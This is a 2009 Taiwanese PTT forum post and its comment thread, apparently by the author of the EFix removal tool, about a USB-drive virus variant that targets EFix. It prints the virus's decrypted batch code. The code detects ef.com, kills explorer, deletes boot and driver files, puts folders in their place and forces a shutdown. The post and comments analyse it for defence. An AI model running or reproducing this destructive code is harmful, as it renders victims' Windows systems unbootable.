PTT數位生活區 / AntiVirus (防毒)

[閒聊] 有意思了...

看板AntiVirus (防毒)作者 (威廉華勒斯)時間16年前 (2009/08/23 01:15), 編輯推噓11(11031)
留言42則, 11人參與, 最新討論串1/1
這一次碰到的隨身碟資料夾型病毒很有意思 感謝香菇小精靈隨身碟病毒清除作者提供了一些資訊 是這樣的. 前幾天我有跟人提到就是台灣製的隨身碟病毒 這個隨身碟病毒有變種 而他這一次的變種有針對EFix而來. 這還第一次碰到....還蠻有意思的 香菇小精靈有提到該病毒會檢測系統裡面的程序 該批次代碼如下: tasklist|findstr /c:"ef.com" && (goto :kill) :kill taskkill /F /IM explorer.exe del /f /s /q /a:h %SystemDrive%\boot.ini del /f /s /q /a:h %SystemDrive%\IO.sys del /f /s /q /a:h %SystemDrive%\CONFIG.SYS del /f /s /q /a:h %SystemDrive%\ntldr del /f /s /q /a:h %SystemDrive%\AUTOEXEC.BAT del /f /s /q /a:h %SystemDrive%\MSDOS.SYS md %SystemDrive%\boot.ini md %SystemDrive%\IO.sys md %SystemDrive%\CONFIG.SYS md %SystemDrive%\ntldr md %SystemDrive%\AUTOEXEC.BAT md %SystemDrive%\MSDOS.SYS del /f /s /q "%windir%\system32\drivers\pci.sys" md "%windir%\system32\drivers\pci.sys" shutdown -f -s -t 0 del %0 上面的代碼我大概解釋一下 該病毒使用tasklist 這一段指令去檢查執行中的程序裡面有沒有一個叫做 ef.com的程序 有的話,就刪除上面從:kill之後的檔案並建立資料夾讓你沒辦法複製回去 然而ef.com 就是EFix使用的主運作程序....XD 所以我想之前有一位版友有碰到ntldr移失的,我看大概就是因為這樣的原因 好樣的.... 我這兩天會找時間再做一些修改,看看能不能突破這惡意攻擊... 有中的人自己先小心點. -- 暮色逼近的雲朵之上,總是孤單一隻地飛著,老鷹一定很悲傷吧 在聲音也中斷的風之中,抓住天空的那對翅膀,無法休息 把心比喻成什麼吧,宛如老鷹一般的這顆心 把心比喻成什麼吧,比喻為宛如在天空飛舞般的悲傷 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 61.216.81.78 ※ 編輯: junorn 來自: 61.216.81.78 (08/23 01:22)
08/23 01:27, , 1F
請問那一段bat碼是明碼嗎? 還是有加密或加殼過?
08/23 01:27, 1F
08/23 01:28, , 2F
這一點我不清楚,不過聽香菇小精靈是說有加密.
08/23 01:28, 2F
08/23 01:28, , 3F
而他解密之後得到的內容大致如上.
08/23 01:28, 3F
08/23 01:29, , 4F
而該病毒作者也在該批次代碼中留下了罵他的代碼.
08/23 01:29, 4F
08/23 01:29, , 5F
罵香菇作者的代碼
08/23 01:29, 5F
08/23 01:29, , 6F
詳情看這篇 http://0rz.tw/vlf9o
08/23 01:29, 6F
08/23 01:34, , 7F
辛苦J大了
08/23 01:34, 7F
08/23 01:45, , 8F
J大大~又要辛苦改程式了
08/23 01:45, 8F
08/23 01:46, , 9F
沒辦法,我當初其實就有作預防了,不過後來想應該不會有人
08/23 01:46, 9F
08/23 01:47, , 10F
要對我這不知名的軟體做攻擊,結果竟然還真的有XD
08/23 01:47, 10F
08/23 01:47, , 11F
也因為沒想到真的有人會作針對性攻擊所以就把預防那一段拿
08/23 01:47, 11F
08/23 01:48, , 12F
掉了...0rz
08/23 01:48, 12F
08/23 02:59, , 13F
有看到了 @@" 算是明碼 只是被塞了很多垃圾字串 0rz
08/23 02:59, 13F
08/23 03:00, , 14F
J大辛苦了 <_ _>
08/23 03:00, 14F
08/23 07:52, , 15F
好精彩 好刺激...大家是不是都熱血起來了
08/23 07:52, 15F
08/23 09:21, , 16F
不算不知名的軟體喔,已經是解隨身碟病毒的王牌了
08/23 09:21, 16F
08/23 13:20, , 17F
要戰了嗎
08/23 13:20, 17F
08/23 13:54, , 18F
恩...現在沒他詳細樣本沒的測,就目前已知他是抓我主程序
08/23 13:54, 18F
08/23 13:55, , 19F
抓到之後作自爆讓系統跟著一起爆,所以目前目標是讓他抓不到
08/23 13:55, 19F
08/23 13:55, , 20F
我主程序...亂數他就抓不到了吧XD
08/23 13:55, 20F
08/23 16:03, , 21F
莫非 這就是傳說中的頂尖對決嗎
08/23 16:03, 21F
08/23 17:13, , 22F
好刺激! J大加油
08/23 17:13, 22F
08/23 21:05, , 23F
小弟覺得, 這要針對EFix攻擊的惡意程式還有個附加作用,
08/23 21:05, 23F
08/23 21:06, , 24F
會造成使用者有"使用EFix後系統會不知道原因爛掉"的錯覺
08/23 21:06, 24F
08/23 21:06, , 25F
, 當然對其實安全軟體做也有類似的效用, 總之這種針對性
08/23 21:06, 25F
08/23 21:08, , 26F
的攻擊來者不善, 要勞煩j大操心了; 話說, 安全軟體有一
08/23 21:08, 26F
08/23 21:09, , 27F
個特性就是得讓使用者知道它還有作用(雖然惡意程式會試
08/23 21:09, 27F
08/23 21:10, , 28F
者癱掉它但讓它好像還活者XD), 亂數主程序的話user要如
08/23 21:10, 28F
08/23 21:10, , 29F
何知道它還有在工作呢@_@"
08/23 21:10, 29F
08/23 21:11, , 30F
更正: "這樣針對", "對其他安全", 年紀大了狂typo...Orz
08/23 21:11, 30F
08/23 21:30, , 31F
放心,亂數主程序只是在程序顯示是亂數而已,介面那些都一
08/23 21:30, 31F
08/23 21:31, , 32F
樣,但錯覺這我就沒辦法,畢竟我在明他在暗,只能說盡量請
08/23 21:31, 32F
08/23 21:31, , 33F
大家能夠將樣本丟上來,這樣我才有機會去作修改...
08/23 21:31, 33F
08/23 21:33, , 34F
像這一次少說他改版已經改了有一段時間,結果還是香菇那邊
08/23 21:33, 34F
08/23 21:33, , 35F
的人將樣本提供給他他才知道..
08/23 21:33, 35F
08/23 21:34, , 36F
然後他貼上來之後我才知道....0rz
08/23 21:34, 36F
08/23 22:32, , 37F
應該也沒想到會主動還擊吧,中毒模式或許跟以前都一樣
08/23 22:32, 37F
08/23 22:33, , 38F
就差讓人有Efix故障錯覺而已,小弟的看法和V大相同 @@"
08/23 22:33, 38F
08/23 22:44, , 39F
所以才說我在明他在暗我沒辦法冏> .. 唯一能作的就是盡量
08/23 22:44, 39F
08/23 22:45, , 40F
能拿到他變種的版本盡早作修改. 這一次我修改過了他現在用
08/23 22:45, 40F
08/23 22:45, , 41F
的手法會失效,但不知道他會換甚麼樣子的手法...
08/23 22:45, 41F
08/24 13:55, , 42F
J大紅了 XD
08/24 13:55, 42F
更多 junorn 的文章
文章代碼(AID): #1Aa2Uorl (AntiVirus)
AntiVirus 近期熱門文章
更多 近期熱門文章 >>
PTT數位生活區 即時熱門文章
18
40
[情報] iOS 26.5
[ iOS ]
roman80010
9小時前, 05/12
更多 即時熱門文章 >>
更多 junorn 的文章
文章代碼(AID): #1Aa2Uorl (AntiVirus)